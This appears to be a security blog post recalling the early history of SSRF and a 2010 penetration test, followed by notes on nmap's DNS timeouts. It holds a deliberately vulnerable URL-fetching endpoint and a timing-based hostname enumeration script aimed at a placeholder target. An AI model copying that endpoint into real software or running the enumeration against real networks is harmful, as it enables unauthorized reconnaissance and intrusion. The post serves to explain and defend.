
A brief history of SSRF


Server-Side Request Forgery is a security issue in applications where an attacker is able to get a server to send some type of request (these days mostly HTTP/S requests) that it was never intended to send on the attacker’s behalf. This is the classic abuse-of-trust vulnerability: the server tends to sit in a “trusted” environment (e.g., a DMZ, your cloud VPC, etc.) while the users of the application sit outside the trust boundary (e.g., mobile devices, cafes, homes, corporate environments, API clients within and outside the cloud).
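To make the class of bug concrete, here is a minimal sketch of the kind of endpoint that gives rise to SSRF. This is an illustration I put together in Python, not code from any particular product, and the route and parameter names are made up: the server blindly fetches whatever URL the client hands it, from inside the trust boundary.

# Hypothetical, minimal SSRF-prone endpoint (illustrative only, not any specific product).
# The handler fetches whatever URL the caller supplies, from inside the trusted network,
# so a user outside the trust boundary can make the server reach hosts it never should,
# e.g. /fetch?url=http://10.0.0.5/admin from the public Internet.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse
from urllib.request import urlopen

class FetchHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        url = query.get("url", [""])[0]            # attacker-controlled, never validated
        if not url:
            self.send_error(400, "missing url parameter")
            return
        body = urlopen(url).read()                 # the server-side request the attacker forges
        self.send_response(200)
        self.end_headers()
        self.wfile.write(body)

HTTPServer(("127.0.0.1", 8080), FetchHandler).serve_forever()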

A brief history
In this blog post, though, I won’t be talking about all the fancy new things that have had SSRF issues; you can likely find a few hundred of those anyway! I am going to talk about the brief history of this issue and what happened before we gave it a name: SSRF. The earliest references to the name “SSRF” appear to come from a talk at Black Hat USA 2012, and the Wayback Machine tells me that the CWE-918 page was authored sometime around 2013. If you look closely at the CWE-918 page, though, you will find older CVEs dating back to 2002 and 2004. There was a ShmooCon talk about the technique in 2008 too, but the term SSRF was not established until 2012.


The Issue

In 2010, I was working on a penetration test for a financial services firm. The target was a popular load balancer that offered a GTM (Global Traffic Manager) solution, which allowed people to log in and obtain restricted execution environments from which certain applications could be exposed, so that remote workers or other untrusted entities could use only the applications you wanted to expose to them. The issue was in a POST request after login and, IIRC, even pre-login (though my details on this are fuzzy). To my knowledge the issue was never assigned a CVE and was not associated with a knowledge base article, although I may not know 100%. The guidance from the vendor was simple: update the software and move on. The issue was this: an authenticated or unauthenticated user could send an HTTP POST request to a page with a base64-encoded parameter that included a hostname, which would trigger a DNS request on the back end of the GTM site. The time it took for the response to come back indicated whether the domain was legitimate or not. So I took a popular dictionary and enumerated which hostnames were legitimate and which were not, both for hosts sitting outside on the Internet and for mapping hosts on the internal network.
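For anyone curious what that enumeration looked like in practice, here is a rough sketch of the idea in Python. The endpoint path, parameter name and timing threshold are placeholders of my own (I no longer have the originals); the point is simply that a base64-encoded hostname goes out in a POST and the response time acts as the oracle.

# Hypothetical reconstruction of the timing-based DNS enumeration; not the real product's
# endpoint or parameter names. Calibrate THRESHOLD against known-good and known-bad names.
import base64
import time

import requests

TARGET = "https://gtm.example.com/some/endpoint"   # assumed endpoint
THRESHOLD = 2.0                                    # seconds; assumed cut-off between the two cases

def probe(hostname: str) -> float:
    payload = {"host": base64.b64encode(hostname.encode()).decode()}   # assumed parameter name
    start = time.monotonic()
    requests.post(TARGET, data=payload, timeout=60)
    return time.monotonic() - start

with open("hostnames.txt") as wordlist:
    for name in (line.strip() for line in wordlist if line.strip()):
        try:
            elapsed = probe(name)
        except requests.RequestException:
            print(f"{name}: request failed")
            continue
        # A quick answer typically means the back-end DNS lookup succeeded; an answer that
        # arrives only after the resolver's timeout typically means the name did not resolve.
        verdict = "resolves" if elapsed < THRESHOLD else "does not resolve"
        print(f"{name}: {elapsed:.2f}s ({verdict})")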

The backstory
What the vendor of the GTM software did not know was how critical this application was to the customer’s business. They seemed to be dragging their feet on updates, and meanwhile the customer, a financial institution with a lot at stake, could not go live. The pressure mounted on the IT staff to fix the issue, and the vendor, while responsive, was unable to give a firm date quickly. Remember, this was 13-14 years ago, before bug bounties, and responsible disclosure was still quite clunky! The customer was also advising me to push the software vendor so we could discuss it. Thankfully, on the vendor side there was a solid security person who understood the issue and its impact immediately and advised the software teams to do what was right. They moved the functionality behind authentication, and they also added tokens, limits and constant-time responses to fix the issue.
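Of those fixes, the constant-time response is the one that directly kills the timing oracle. Here is a minimal sketch of the idea, my own illustration rather than the vendor’s code: measure how long the real lookup took and pad the response so that every request takes roughly the same wall-clock time.

# Illustrative constant-time response padding; not the vendor's implementation.
import time

FLOOR_SECONDS = 5.0   # chosen to exceed the slowest legitimate back-end lookup

def handle_request(do_lookup, hostname: str):
    start = time.monotonic()
    result = do_lookup(hostname)              # the real work, e.g. the back-end DNS query
    elapsed = time.monotonic() - start
    if elapsed < FLOOR_SECONDS:
        time.sleep(FLOOR_SECONDS - elapsed)   # pad so fast and slow lookups look the same
    return result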

Fast forward
Today, obviously, things are a lot better. I wrote this blog post so I can look back and point to it in a meaningful way, without forgetting the old experiences among the new.


Nmap and DNS resolution Timeouts


I think Nmap is by far the best port scanner around if you want to do some serious port scanning. Nmap performs DNS resolution by default. This is good for obtaining fully qualified domain names (FQDNs); however, when you are scanning huge networks spanning several class Bs, it can have a significant effect on the duration of the scan.
Using the -n parameter can completely stop nmap from performing any resolution, but sometimes there is a finer granularity that you need, i.e., you want to perform name resolution, but not if it exceeds a certain amount of time. I have to say that I wouldn’t even have craved such an idiosyncratic feature had it not been for nmap; Fyodor has been awesome enough to provide fine-grained control over port scanning to your heart’s content.
So I opened up the nmap code to figure out whether I could fine-tune that behavior myself, and I was not at all surprised to find several comments in the code giving the impression that the authors of nmap have been considering this feature.
At this time it seems that the timeouts for the DNS servers are read out of an array, static int read_timeouts[][], in nmap_dns.cc. This array holds retransmission timeouts: each row represents the retransmission timeouts that nmap will follow, depending on the number of DNS servers provided.

In nmap 4.76, therefore, if you specify one DNS server (or only one entry exists in /etc/resolv.conf), nmap will wait 4000 ms, then another 4000 ms, followed by 5000 ms before giving up. If you specify two DNS servers, then for the first DNS server the timeouts are 2500 ms followed by 4000 ms, and the same schedule is then tried for the second entry. Either way, it seems that nmap will wait at most 13 seconds before giving up on the DNS resolution of a host. Imagine scanning a class B and having to wait 13 seconds for each host to resolve; it would be a significant overhead.
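If my reading of that table is right, the worst case works out to the same ceiling in both configurations. Here is the back-of-the-envelope arithmetic, using the nmap 4.76 values described above (which I have not re-checked against newer releases):

# Worst-case per-host DNS wait, based on the retransmission schedules described above
# for nmap 4.76 (as read out of read_timeouts[][] in nmap_dns.cc).
schedules_ms = {
    1: [4000, 4000, 5000],   # one DNS server: three tries against the same server
    2: [2500, 4000],         # two DNS servers: this schedule is run against each server
}

one_server = sum(schedules_ms[1])        # 13000 ms
two_servers = 2 * sum(schedules_ms[2])   # 13000 ms
print(one_server, two_servers)           # both come out to 13 seconds per unresolved host

# Serial worst case for a class B; nmap does parallelize its lookups, so the real-world
# overhead is smaller, but the per-host ceiling is still what you are waiting on.
hosts_in_class_b = 65536
print(hosts_in_class_b * one_server / 1000 / 3600, "hours if every lookup times out")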

Of course, one can find other things to do if the IP address space is not DHCP, e.g., starting a separate list scan (-sL) and a port scan (with -n) simultaneously so that the DNS resolution timeouts do not have a major impact on the port scanning itself (a rough sketch of this follows below).
There could be pros and cons to this as well that I may have failed to consider, but at this time it seems like the most judicious approach.
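To make that workaround concrete, here is a rough sketch of running the two scans side by side from Python; the target range, port list and output file names are placeholders of my own choosing.

# Illustrative only: run a resolving list scan and a non-resolving port scan in parallel.
# Flags used: -sL (list scan), -n (no DNS), -p (ports), -oN/-oG (output formats).
import subprocess

NETWORK = "10.10.0.0/16"   # placeholder target range

list_scan = subprocess.Popen(
    ["nmap", "-sL", "-oN", "names.txt", NETWORK]                    # does the DNS lookups, no probing
)
port_scan = subprocess.Popen(
    ["nmap", "-n", "-p", "1-1024", "-oG", "ports.gnmap", NETWORK]   # probes ports, skips DNS
)

list_scan.wait()
port_scan.wait()
# Afterwards, join names.txt and ports.gnmap by IP address to get FQDNs alongside open ports.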